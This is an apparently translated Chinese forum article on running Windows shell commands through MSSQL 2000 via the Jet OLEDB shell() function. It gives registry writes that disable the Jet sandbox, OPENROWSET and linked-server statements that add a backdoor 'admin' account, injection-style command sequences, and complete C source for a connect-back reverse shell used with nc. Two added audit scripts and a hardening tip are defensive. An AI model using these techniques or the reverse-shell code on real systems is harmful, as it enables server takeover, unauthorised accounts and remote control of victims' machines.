Execute commands without xp_cmdshell

Source: Internet
Author: User

Using Jet to execute shell commands is cheaper than trying to restore xp_cmdshell, but you need to guess the system path:
NT/2K: X:\winnt\system32\
XP/2003: X:\windows\system32\
Solution:
If you do not need RDS support, delete X:\Program Files\Common Files\System\MSADC\msadcs.dll.
Modifying the registry alone is not enough; see below for details.

Of course, besides IAS.mdb there are other MDB files; any one that exists will do.
Under system32 on 2003 there are two: IAS.mdb and dnary.mdb.
For other systems, check with dir /a /s *.mdb.

If there is an echo you can see the result returned by the execution; otherwise you have to judge the host OS type and try again.
Of course, if you want to be a bit brute-force, you can simply try all four in turn.

First, switch on Jet sandbox mode by modifying the registry through the extended stored procedure xp_regwrite; an administrator cannot prevent this registry modification.
For security reasons sandbox mode is not enabled by default, which is why xp_regwrite is needed. xp_regwrite requires at least db_owner permission; for convenience, test with sysadmin:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
Note (meaning of the SandboxMode value):
0: disabled everywhere (default)
1: enabled for Access, but disabled for other applications
2: disabled for Access, but enabled for other applications
3: enabled everywhere
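An added audit and hardening script (not from the original post) for the registry value just described: it reads SandboxMode with xp_regread, decodes it with the post's value table, and resets it to 3 when it is in one of the states that leaves Jet unsandboxed for SQL Server. It assumes SQL Server 2000 extended procedures and a sysadmin login.

```sql
-- Added example: audit the Jet SandboxMode value used by the OPENROWSET/shell() trick.
-- Assumes sysadmin and the SQL Server 2000 xp_regread / xp_regwrite procedures.
DECLARE @mode INT, @meaning VARCHAR(60)

-- xp_regread raises an error and leaves @mode NULL when the value is absent.
EXEC master.dbo.xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SOFTWARE\Microsoft\Jet\4.0\Engines',
    @value_name = 'SandboxMode',
    @value      = @mode OUTPUT

-- Decode using the value table given in the post.
SET @meaning = CASE @mode
    WHEN 0 THEN 'sandbox disabled everywhere'
    WHEN 1 THEN 'enabled for Access, disabled for other apps (incl. SQL Server)'
    WHEN 2 THEN 'disabled for Access, enabled for other apps'
    WHEN 3 THEN 'sandbox enabled everywhere'
    ELSE        'value missing or unexpected'
END
PRINT 'SandboxMode = ' + ISNULL(CAST(@mode AS VARCHAR(10)), 'NULL') + ' (' + @meaning + ')'

-- 0 and 1 both leave Jet unsandboxed for non-Access callers such as SQL Server,
-- which is exactly the state the post's shell() call depends on.
IF @mode IS NULL OR @mode IN (0, 1)
BEGIN
    PRINT 'Resetting SandboxMode to 3 (enabled everywhere)'
    EXEC master.dbo.xp_regwrite
        'HKEY_LOCAL_MACHINE',
        'SOFTWARE\Microsoft\Jet\4.0\Engines',
        'SandboxMode', 'REG_DWORD', 3
END
```

Run it from a SQL Agent job or a periodic check so that any later xp_regwrite of this value is noticed and reverted.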

In fact, this statement can be executed with db_owner permission, but the statements that follow have different requirements and cannot be executed directly; see the explanation of each statement below.

Then run the system command through Jet.OLEDB. This only requires read permission on %SystemRoot%, which is still rather loose, so the harm is quite high.
A user with only db_owner permission has to establish a linked-server connection to the database to reach it; direct access is not allowed. Whether that access succeeds has not been tested; if you are interested, test it yourself.
On MSDN:
"sp_addlinkedserver: Execute permissions default to members of the sysadmin and setupadmin fixed server roles."
So sp_addlinkedserver/sp_addlinkedsrvlogin can be executed with setupadmin permission, while db_owner has all permissions in the database, which in theory should succeed.

Here, only the commands used with sysadmin permission are given:
select * from openrowset('Microsoft.Jet.OLEDB.4.0',';database=c:\winnt\system32\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

To create a linked server named 'l0op8ack', refer to this command:
exec sp_addlinkedserver 'l0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

The test result is verified as follows (sysadmin permission, MSSQL 2000 SP3 installed on Win2003 SP1):

Appendix:
When the database server cannot be connected to directly (the database is generally not open to the outside, but it can connect outward),
you can use the connect-back DOS shell method, or rewrite it as a bind shell!
==================================== Cut here ====================================
// Name: Win32 connect back shell source code for NT/2k/XP/2003
// Compile: cl win32cbsh.c (VC6)
// Usage:
// On your PC: nc -l -p {Listen port}
// On victim PC: win32cbsh {Your IP} {Listen port}
// Warning: If there's no parameter specified, it will cause "Fatal error"
#include <winsock2.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32")
int main(int argc, char **argv)
{
    WSADATA wsadata;
    SOCKET hsocket;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in adik_sin;
    memset(&adik_sin, 0, sizeof(adik_sin));
    memset(&si, 0, sizeof(si));
    WSAStartup(MAKEWORD(2, 0), &wsadata);
    /* non-overlapped socket so the handle can be passed as a std handle */
    hsocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    adik_sin.sin_family = AF_INET;
    adik_sin.sin_port = htons(atoi(argv[2]));
    adik_sin.sin_addr.s_addr = inet_addr(argv[1]);
    if (0 != connect(hsocket, (struct sockaddr *)&adik_sin, sizeof(adik_sin))) return -1;
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (void *)hsocket;
    CreateProcess(NULL, "cmd.exe", NULL, NULL, 1, 0, NULL, NULL, &si, &pi);
    return 0;
}
This method can be executed, but unfortunately db_owner permission is insufficient: at least sysadmin, or the securityadmin + setupadmin combination, is required.

sp_addlinkedserver requires sysadmin or setupadmin permission.
sp_addlinkedsrvlogin requires sysadmin or securityadmin permission.
In the end we found that only an sa account, or an account with setupadmin + securityadmin, can be used,
and generally no administrator grants an ordinary account those permissions.

Not practical; recorded only as a learning conclusion.

The general process is as follows. If the login is not sysadmin, the permission check on IAS.mdb fails;
during testing I granted setupadmin + securityadmin to the hacker user and still failed to use IAS.mdb.
You need to find an MDB that an ordinary user can access:

exec sp_addlinkedserver 'l0op8ack','jetoledb','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
exec sp_addlinkedsrvlogin 'l0op8ack','hacker';--
select * from openquery(l0op8ack,'select shell("cmd.exe /c net user")');--
exec sp_droplinkedsrvlogin 'l0op8ack','hacker';--
exec sp_dropserver 'l0op8ack';--
In my SQL 2000 SP3, sp_addlinkedsrvlogin must be followed by a user name; passing true or false instead returns a "no such user" error.

Haha, but it still fails.

The original process could also be done through injection; after the service pack was applied it no longer works.

Excerpt from the T-SQL reference: the T-SQL reference describes two methods of referencing heterogeneous OLE DB data sources.
OPENROWSET requires sa permission, and if you try to break through with sp_addlinkedserver/OPENQUERY you will find it cannot succeed.
==============================================================
Distributed Query Architecture
Microsoft SQL Server 2000 supports two methods of referencing heterogeneous OLE DB data sources in Transact-SQL statements:

1) Linked server names
The system stored procedures sp_addlinkedserver and sp_addlinkedsrvlogin are used to give a server name to an OLE DB data source. Objects on these linked servers can then be referenced in Transact-SQL statements with four-part names. For example, if a linked server named DeptSQLSrvr is defined against another copy of SQL Server 2000, the following statement references a table on that server:

SELECT * FROM DeptSQLSrvr.Northwind.dbo.Employees

A linked server name can also be specified in an OPENQUERY statement to open a rowset from the OLE DB data source; the rowset can then be referenced in a Transact-SQL statement as if it were a table.

2) Ad hoc connector names
For data sources that are referenced infrequently, the OPENROWSET or OPENDATASOURCE function specifies the information needed to connect to the server. The rowset can then be referenced in Transact-SQL the same way a table is referenced:

SELECT *
FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0',
     'c:\MSOffice\Access\Samples\Northwind.mdb';'admin';'',
     Employees)

SQL Server 2000 uses OLE DB to communicate between the relational engine and the storage engine. The relational engine splits each Transact-SQL statement into a series of operations that are executed on simple OLE DB rowsets opened by the storage engine from the base tables. This means that the relational engine can also open a simple OLE DB rowset on any OLE DB data source.
1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',0 writes a registry value that sets Access sandbox mode, i.e. allows functions outside the application to be executed.
2. Open an Access file with OPENROWSET. There are four such files under %WINDIR%\system32\IAS; use whichever is available.
3. The function executed is:
Function Shell(ByVal Command As String) As Long
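An added audit script (not from the original post) covering both the linked-server sequence above and the three-step recap: it lists the logins that hold the roles the post says are sufficient (sysadmin, or setupadmin + securityadmin), finds linked servers built on the Jet provider, shows their login mappings, and drops them. It assumes SQL Server 2000 system tables and a sysadmin login.

```sql
-- Added example: find who could run the post's linked-server sequence and
-- remove leftover Jet linked servers. Assumes SQL Server 2000 and sysadmin.

-- 1. Logins able to run sp_addlinkedserver + sp_addlinkedsrvlogin
--    (sysadmin alone, or setupadmin together with securityadmin).
SELECT name, sysadmin, setupadmin, securityadmin
FROM   master.dbo.syslogins
WHERE  sysadmin = 1
   OR (setupadmin = 1 AND securityadmin = 1)
ORDER BY name

-- 2. Linked servers defined on top of Microsoft.Jet.OLEDB.4.0 (e.g. ias.mdb).
SELECT srvname, providername, datasource, catalog
FROM   master.dbo.sysservers
WHERE  providername = 'Microsoft.Jet.OLEDB.4.0'

-- 3. For each of them, show which local logins are mapped, then drop the
--    server together with its login mappings.
DECLARE @srv sysname
DECLARE jet_links CURSOR LOCAL FAST_FORWARD FOR
    SELECT srvname FROM master.dbo.sysservers
    WHERE  providername = 'Microsoft.Jet.OLEDB.4.0'
OPEN jet_links
FETCH NEXT FROM jet_links INTO @srv
WHILE @@FETCH_STATUS = 0
BEGIN
    PRINT 'Jet linked server: ' + @srv
    EXEC sp_helplinkedsrvlogin @rmtsrvname = @srv
    -- Comment the next line out to audit without removing anything.
    EXEC sp_dropserver @server = @srv, @droplogins = 'droplogins'
    FETCH NEXT FROM jet_links INTO @srv
END
CLOSE jet_links
DEALLOCATE jet_links
```

Review the output of steps 1 and 2 first; a Jet linked server pointing at a file under %WINDIR%\system32\IAS has no legitimate purpose and is the residue the post's OPENQUERY path leaves behind.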

This article comes from [attention space], original article link: http://www.8-du.net/Article/2008/0514/article_40240.html
